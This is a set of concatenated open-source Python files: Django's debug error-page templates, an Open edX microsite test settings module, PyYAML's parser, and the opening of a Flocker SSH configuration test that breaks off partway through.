{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}"""
"{% for source_line in template_info.source_lines %}"
"{% ifequal source_line.0 template_info.line %}"
" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}"
"{% else %}"
" {{ source_line.0 }} : {{ source_line.1 }}"
"""{% endifequal %}{% endfor %}{% endif %}
Traceback:{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}{% endif %}{% endifchanged %}
File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code.
</p>
</div>
{% endif %}
</body>
</html>
""")
TECHNICAL_500_TEXT_TEMPLATE = ("""{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception message supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}
{% for source_line in template_info.source_lines %}"""
"{% ifequal source_line.0 template_info.line %}"
" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}"
"{% else %}"
" {{ source_line.0 }} : {{ source_line.1 }}"
"""{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:"""
"{% for frame in frames %}"
"{% ifchanged frame.exc_cause %}"
" {% if frame.exc_cause %}" """
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
{% endif %}
{% endifchanged %}
File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% if not is_email %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard page generated by the handler for this status code.
{% endif %}
""")
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% if raising_view_name %}
<tr>
<th>Raised by:</th>
<td>{{ raising_view_name }}</td>
</tr>
{% endif %}
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>{{ title }}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ heading }}</h1>
<h2>{{ subheading }}</h2>
</div>
<div id="instructions">
<p>
{{ instructions|safe }}
</p>
</div>
<div id="explanation">
<p>
{{ explanation|safe }}
</p>
</div>
</body></html>
"""
| bsd-3-clause |
SivilTaram/edx-platform | lms/envs/cms/microsite_test.py | 110 | 1675 | """
This is a localdev test for the Microsite processing pipeline
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=wildcard-import, unused-wildcard-import
# Pylint gets confused by path.py instances, which report themselves as class
# objects. As a result, pylint applies the wrong regex in validating names,
# and throws spurious errors. Therefore, we disable invalid-name checking.
# pylint: disable=invalid-name
from .dev import *
from ..dev import ENV_ROOT, FEATURES
MICROSITE_CONFIGURATION = {
"openedx": {
"domain_prefix": "openedx",
"university": "openedx",
"platform_name": "Open edX",
"logo_image_url": "openedx/images/header-logo.png",
"email_from_address": "[email protected]",
"payment_support_email": "[email protected]",
"ENABLE_MKTG_SITE": False,
"SITE_NAME": "openedx.localhost",
"course_org_filter": "CDX",
"course_about_show_social_links": False,
"css_overrides_file": "openedx/css/openedx.css",
"show_partners": False,
"show_homepage_promo_video": False,
"course_index_overlay_text": "Explore free courses from leading universities.",
"course_index_overlay_logo_file": "openedx/images/header-logo.png",
"homepage_overlay_html": "<h1>Take an Open edX Course</h1>"
}
}
MICROSITE_ROOT_DIR = ENV_ROOT / 'edx-microsite'
# pretend we are behind some marketing site, we want to be able to assert that the Microsite config values override
# this global setting
FEATURES['ENABLE_MKTG_SITE'] = True
FEATURES['USE_MICROSITES'] = True
| agpl-3.0 |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/yaml/parser.py | 409 | 25542 |
# The following YAML grammar is LL(1) and is parsed by a recursive descent
# parser.
#
# stream ::= STREAM-START implicit_document? explicit_document* STREAM-END
# implicit_document ::= block_node DOCUMENT-END*
# explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END*
# block_node_or_indentless_sequence ::=
# ALIAS
# | properties (block_content | indentless_block_sequence)?
# | block_content
# | indentless_block_sequence
# block_node ::= ALIAS
# | properties block_content?
# | block_content
# flow_node ::= ALIAS
# | properties flow_content?
# | flow_content
# properties ::= TAG ANCHOR? | ANCHOR TAG?
# block_content ::= block_collection | flow_collection | SCALAR
# flow_content ::= flow_collection | SCALAR
# block_collection ::= block_sequence | block_mapping
# flow_collection ::= flow_sequence | flow_mapping
# block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END
# indentless_sequence ::= (BLOCK-ENTRY block_node?)+
# block_mapping ::= BLOCK-MAPPING_START
# ((KEY block_node_or_indentless_sequence?)?
# (VALUE block_node_or_indentless_sequence?)?)*
# BLOCK-END
# flow_sequence ::= FLOW-SEQUENCE-START
# (flow_sequence_entry FLOW-ENTRY)*
# flow_sequence_entry?
# FLOW-SEQUENCE-END
# flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
# flow_mapping ::= FLOW-MAPPING-START
# (flow_mapping_entry FLOW-ENTRY)*
# flow_mapping_entry?
# FLOW-MAPPING-END
# flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
#
# FIRST sets:
#
# stream: { STREAM-START }
# explicit_document: { DIRECTIVE DOCUMENT-START }
# implicit_document: FIRST(block_node)
# block_node: { ALIAS TAG ANCHOR SCALAR BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START }
# flow_node: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START }
# block_content: { BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START SCALAR }
# flow_content: { FLOW-SEQUENCE-START FLOW-MAPPING-START SCALAR }
# block_collection: { BLOCK-SEQUENCE-START BLOCK-MAPPING-START }
# flow_collection: { FLOW-SEQUENCE-START FLOW-MAPPING-START }
# block_sequence: { BLOCK-SEQUENCE-START }
# block_mapping: { BLOCK-MAPPING-START }
# block_node_or_indentless_sequence: { ALIAS ANCHOR TAG SCALAR BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START BLOCK-ENTRY }
# indentless_sequence: { ENTRY }
# flow_collection: { FLOW-SEQUENCE-START FLOW-MAPPING-START }
# flow_sequence: { FLOW-SEQUENCE-START }
# flow_mapping: { FLOW-MAPPING-START }
# flow_sequence_entry: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START KEY }
# flow_mapping_entry: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START KEY }
__all__ = ['Parser', 'ParserError']
from error import MarkedYAMLError
from tokens import *
from events import *
from scanner import *
class ParserError(MarkedYAMLError):
pass
class Parser(object):
# Since writing a recursive-descendant parser is a straightforward task, we
# do not give many comments here.
DEFAULT_TAGS = {
u'!': u'!',
u'!!': u'tag:yaml.org,2002:',
}
def __init__(self):
self.current_event = None
self.yaml_version = None
self.tag_handles = {}
self.states = []
self.marks = []
self.state = self.parse_stream_start
def dispose(self):
# Reset the state attributes (to clear self-references)
self.states = []
self.state = None
def check_event(self, *choices):
# Check the type of the next event.
if self.current_event is None:
if self.state:
self.current_event = self.state()
if self.current_event is not None:
if not choices:
return True
for choice in choices:
if isinstance(self.current_event, choice):
return True
return False
def peek_event(self):
# Get the next event.
if self.current_event is None:
if self.state:
self.current_event = self.state()
return self.current_event
def get_event(self):
# Get the next event and proceed further.
if self.current_event is None:
if self.state:
self.current_event = self.state()
value = self.current_event
self.current_event = None
return value
# stream ::= STREAM-START implicit_document? explicit_document* STREAM-END
# implicit_document ::= block_node DOCUMENT-END*
# explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END*
def parse_stream_start(self):
# Parse the stream start.
token = self.get_token()
event = StreamStartEvent(token.start_mark, token.end_mark,
encoding=token.encoding)
# Prepare the next state.
self.state = self.parse_implicit_document_start
return event
def parse_implicit_document_start(self):
# Parse an implicit document.
if not self.check_token(DirectiveToken, DocumentStartToken,
StreamEndToken):
self.tag_handles = self.DEFAULT_TAGS
token = self.peek_token()
start_mark = end_mark = token.start_mark
event = DocumentStartEvent(start_mark, end_mark,
explicit=False)
# Prepare the next state.
self.states.append(self.parse_document_end)
self.state = self.parse_block_node
return event
else:
return self.parse_document_start()
def parse_document_start(self):
# Parse any extra document end indicators.
while self.check_token(DocumentEndToken):
self.get_token()
# Parse an explicit document.
if not self.check_token(StreamEndToken):
token = self.peek_token()
start_mark = token.start_mark
version, tags = self.process_directives()
if not self.check_token(DocumentStartToken):
raise ParserError(None, None,
"expected '<document start>', but found %r"
% self.peek_token().id,
self.peek_token().start_mark)
token = self.get_token()
end_mark = token.end_mark
event = DocumentStartEvent(start_mark, end_mark,
explicit=True, version=version, tags=tags)
self.states.append(self.parse_document_end)
self.state = self.parse_document_content
else:
# Parse the end of the stream.
token = self.get_token()
event = StreamEndEvent(token.start_mark, token.end_mark)
assert not self.states
assert not self.marks
self.state = None
return event
def parse_document_end(self):
# Parse the document end.
token = self.peek_token()
start_mark = end_mark = token.start_mark
explicit = False
if self.check_token(DocumentEndToken):
token = self.get_token()
end_mark = token.end_mark
explicit = True
event = DocumentEndEvent(start_mark, end_mark,
explicit=explicit)
# Prepare the next state.
self.state = self.parse_document_start
return event
def parse_document_content(self):
if self.check_token(DirectiveToken,
DocumentStartToken, DocumentEndToken, StreamEndToken):
event = self.process_empty_scalar(self.peek_token().start_mark)
self.state = self.states.pop()
return event
else:
return self.parse_block_node()
def process_directives(self):
self.yaml_version = None
self.tag_handles = {}
while self.check_token(DirectiveToken):
token = self.get_token()
if token.name == u'YAML':
if self.yaml_version is not None:
raise ParserError(None, None,
"found duplicate YAML directive", token.start_mark)
major, minor = token.value
if major != 1:
raise ParserError(None, None,
"found incompatible YAML document (version 1.* is required)",
token.start_mark)
self.yaml_version = token.value
elif token.name == u'TAG':
handle, prefix = token.value
if handle in self.tag_handles:
raise ParserError(None, None,
"duplicate tag handle %r" % handle.encode('utf-8'),
token.start_mark)
self.tag_handles[handle] = prefix
if self.tag_handles:
value = self.yaml_version, self.tag_handles.copy()
else:
value = self.yaml_version, None
for key in self.DEFAULT_TAGS:
if key not in self.tag_handles:
self.tag_handles[key] = self.DEFAULT_TAGS[key]
return value
# block_node_or_indentless_sequence ::= ALIAS
# | properties (block_content | indentless_block_sequence)?
# | block_content
# | indentless_block_sequence
# block_node ::= ALIAS
# | properties block_content?
# | block_content
# flow_node ::= ALIAS
# | properties flow_content?
# | flow_content
# properties ::= TAG ANCHOR? | ANCHOR TAG?
# block_content ::= block_collection | flow_collection | SCALAR
# flow_content ::= flow_collection | SCALAR
# block_collection ::= block_sequence | block_mapping
# flow_collection ::= flow_sequence | flow_mapping
def parse_block_node(self):
return self.parse_node(block=True)
def parse_flow_node(self):
return self.parse_node()
def parse_block_node_or_indentless_sequence(self):
return self.parse_node(block=True, indentless_sequence=True)
def parse_node(self, block=False, indentless_sequence=False):
if self.check_token(AliasToken):
token = self.get_token()
event = AliasEvent(token.value, token.start_mark, token.end_mark)
self.state = self.states.pop()
else:
anchor = None
tag = None
start_mark = end_mark = tag_mark = None
if self.check_token(AnchorToken):
token = self.get_token()
start_mark = token.start_mark
end_mark = token.end_mark
anchor = token.value
if self.check_token(TagToken):
token = self.get_token()
tag_mark = token.start_mark
end_mark = token.end_mark
tag = token.value
elif self.check_token(TagToken):
token = self.get_token()
start_mark = tag_mark = token.start_mark
end_mark = token.end_mark
tag = token.value
if self.check_token(AnchorToken):
token = self.get_token()
end_mark = token.end_mark
anchor = token.value
if tag is not None:
handle, suffix = tag
if handle is not None:
if handle not in self.tag_handles:
raise ParserError("while parsing a node", start_mark,
"found undefined tag handle %r" % handle.encode('utf-8'),
tag_mark)
tag = self.tag_handles[handle]+suffix
else:
tag = suffix
#if tag == u'!':
# raise ParserError("while parsing a node", start_mark,
# "found non-specific tag '!'", tag_mark,
# "Please check 'http://pyyaml.org/wiki/YAMLNonSpecificTag' and share your opinion.")
if start_mark is None:
start_mark = end_mark = self.peek_token().start_mark
event = None
implicit = (tag is None or tag == u'!')
if indentless_sequence and self.check_token(BlockEntryToken):
end_mark = self.peek_token().end_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark)
self.state = self.parse_indentless_sequence_entry
else:
if self.check_token(ScalarToken):
token = self.get_token()
end_mark = token.end_mark
if (token.plain and tag is None) or tag == u'!':
implicit = (True, False)
elif tag is None:
implicit = (False, True)
else:
implicit = (False, False)
event = ScalarEvent(anchor, tag, implicit, token.value,
start_mark, end_mark, style=token.style)
self.state = self.states.pop()
elif self.check_token(FlowSequenceStartToken):
end_mark = self.peek_token().end_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=True)
self.state = self.parse_flow_sequence_first_entry
elif self.check_token(FlowMappingStartToken):
end_mark = self.peek_token().end_mark
event = MappingStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=True)
self.state = self.parse_flow_mapping_first_key
elif block and self.check_token(BlockSequenceStartToken):
end_mark = self.peek_token().start_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=False)
self.state = self.parse_block_sequence_first_entry
elif block and self.check_token(BlockMappingStartToken):
end_mark = self.peek_token().start_mark
event = MappingStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=False)
self.state = self.parse_block_mapping_first_key
elif anchor is not None or tag is not None:
# Empty scalars are allowed even if a tag or an anchor is
# specified.
event = ScalarEvent(anchor, tag, (implicit, False), u'',
start_mark, end_mark)
self.state = self.states.pop()
else:
if block:
node = 'block'
else:
node = 'flow'
token = self.peek_token()
raise ParserError("while parsing a %s node" % node, start_mark,
"expected the node content, but found %r" % token.id,
token.start_mark)
return event
# block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END
def parse_block_sequence_first_entry(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_block_sequence_entry()
def parse_block_sequence_entry(self):
if self.check_token(BlockEntryToken):
token = self.get_token()
if not self.check_token(BlockEntryToken, BlockEndToken):
self.states.append(self.parse_block_sequence_entry)
return self.parse_block_node()
else:
self.state = self.parse_block_sequence_entry
return self.process_empty_scalar(token.end_mark)
if not self.check_token(BlockEndToken):
token = self.peek_token()
raise ParserError("while parsing a block collection", self.marks[-1],
"expected <block end>, but found %r" % token.id, token.start_mark)
token = self.get_token()
event = SequenceEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
# indentless_sequence ::= (BLOCK-ENTRY block_node?)+
def parse_indentless_sequence_entry(self):
if self.check_token(BlockEntryToken):
token = self.get_token()
if not self.check_token(BlockEntryToken,
KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_indentless_sequence_entry)
return self.parse_block_node()
else:
self.state = self.parse_indentless_sequence_entry
return self.process_empty_scalar(token.end_mark)
token = self.peek_token()
event = SequenceEndEvent(token.start_mark, token.start_mark)
self.state = self.states.pop()
return event
# block_mapping ::= BLOCK-MAPPING_START
# ((KEY block_node_or_indentless_sequence?)?
# (VALUE block_node_or_indentless_sequence?)?)*
# BLOCK-END
def parse_block_mapping_first_key(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_block_mapping_key()
def parse_block_mapping_key(self):
if self.check_token(KeyToken):
token = self.get_token()
if not self.check_token(KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_block_mapping_value)
return self.parse_block_node_or_indentless_sequence()
else:
self.state = self.parse_block_mapping_value
return self.process_empty_scalar(token.end_mark)
if not self.check_token(BlockEndToken):
token = self.peek_token()
raise ParserError("while parsing a block mapping", self.marks[-1],
"expected <block end>, but found %r" % token.id, token.start_mark)
token = self.get_token()
event = MappingEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_block_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_block_mapping_key)
return self.parse_block_node_or_indentless_sequence()
else:
self.state = self.parse_block_mapping_key
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_block_mapping_key
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
# flow_sequence ::= FLOW-SEQUENCE-START
# (flow_sequence_entry FLOW-ENTRY)*
# flow_sequence_entry?
# FLOW-SEQUENCE-END
# flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
#
# Note that while production rules for both flow_sequence_entry and
# flow_mapping_entry are equal, their interpretations are different.
# For `flow_sequence_entry`, the part `KEY flow_node? (VALUE flow_node?)?`
# generate an inline mapping (set syntax).
def parse_flow_sequence_first_entry(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_flow_sequence_entry(first=True)
def parse_flow_sequence_entry(self, first=False):
if not self.check_token(FlowSequenceEndToken):
if not first:
if self.check_token(FlowEntryToken):
self.get_token()
else:
token = self.peek_token()
raise ParserError("while parsing a flow sequence", self.marks[-1],
"expected ',' or ']', but got %r" % token.id, token.start_mark)
if self.check_token(KeyToken):
token = self.peek_token()
event = MappingStartEvent(None, None, True,
token.start_mark, token.end_mark,
flow_style=True)
self.state = self.parse_flow_sequence_entry_mapping_key
return event
elif not self.check_token(FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry)
return self.parse_flow_node()
token = self.get_token()
event = SequenceEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_flow_sequence_entry_mapping_key(self):
token = self.get_token()
if not self.check_token(ValueToken,
FlowEntryToken, FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry_mapping_value)
return self.parse_flow_node()
else:
self.state = self.parse_flow_sequence_entry_mapping_value
return self.process_empty_scalar(token.end_mark)
def parse_flow_sequence_entry_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(FlowEntryToken, FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry_mapping_end)
return self.parse_flow_node()
else:
self.state = self.parse_flow_sequence_entry_mapping_end
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_flow_sequence_entry_mapping_end
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
def parse_flow_sequence_entry_mapping_end(self):
self.state = self.parse_flow_sequence_entry
token = self.peek_token()
return MappingEndEvent(token.start_mark, token.start_mark)
# flow_mapping ::= FLOW-MAPPING-START
# (flow_mapping_entry FLOW-ENTRY)*
# flow_mapping_entry?
# FLOW-MAPPING-END
# flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
def parse_flow_mapping_first_key(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_flow_mapping_key(first=True)
def parse_flow_mapping_key(self, first=False):
if not self.check_token(FlowMappingEndToken):
if not first:
if self.check_token(FlowEntryToken):
self.get_token()
else:
token = self.peek_token()
raise ParserError("while parsing a flow mapping", self.marks[-1],
"expected ',' or '}', but got %r" % token.id, token.start_mark)
if self.check_token(KeyToken):
token = self.get_token()
if not self.check_token(ValueToken,
FlowEntryToken, FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_value)
return self.parse_flow_node()
else:
self.state = self.parse_flow_mapping_value
return self.process_empty_scalar(token.end_mark)
elif not self.check_token(FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_empty_value)
return self.parse_flow_node()
token = self.get_token()
event = MappingEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_flow_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(FlowEntryToken, FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_key)
return self.parse_flow_node()
else:
self.state = self.parse_flow_mapping_key
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_flow_mapping_key
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
def parse_flow_mapping_empty_value(self):
self.state = self.parse_flow_mapping_key
return self.process_empty_scalar(self.peek_token().start_mark)
def process_empty_scalar(self, mark):
return ScalarEvent(None, None, (True, False), u'', mark, mark)
| mit |
Azulinho/flocker | flocker/cli/functional/test_sshconfig.py | 15 | 9942 | # Copyright Hybrid Logic Ltd. See LICENSE file for details.
"""
Tests for ``flocker.cli._sshconfig``.
"""
from os.path import expanduser
from socket import socket
from subprocess import CalledProcessError
from twisted.trial.unittest import TestCase
from twisted.python.filepath import FilePath, Permissions
from twisted.internet.threads import deferToThread
from .. import configure_ssh
from .._sshconfig import OpenSSHConfiguration
from ...testtools.ssh import create_ssh_server, create_ssh_agent, if_conch
try:
from twisted.conch.ssh.keys import Key
except ImportError:
pass
def goodlines(path):
"""
Return a list of lines read from ``path`` excluding those that are blank
or begin with ``#``.
:param FilePath path: The path to the file to read.
:return: A ``list`` of ``bytes`` giving good lines from the file.
"""
return list(line for line in path.getContent().splitlines()
if line and not line.strip().startswith(b"#"))
class ConfigureSSHTests(TestCase):
"""
Tests for ``configure_ssh``.
"""
def setUp(self):
self.ssh_config = FilePath(self.mktemp())
self.server = create_ssh_server(self.ssh_config)
# Create a fake local keypair
self.addCleanup(self.server.restore)
self.flocker_config = FilePath(self.mktemp())
self.config = OpenSSHConfiguration(
ssh_config_path=self.ssh_config,
flocker_path=self.flocker_config)
self.config.create_keypair()
self.configure_ssh = self.config.configure_ssh
self.agent = create_ssh_agent(self.server.key_path, testcase=self)
def test_connection_failed(self):
"""
If an SSH connection cannot be established to the given address then an
exception is raised explaining that this is so.
"""
# Bind a port and guarantee it is not accepting connections.
blocker = socket()
blocker.bind((b"127.0.0.1", 0))
port = blocker.getsockname()[1]
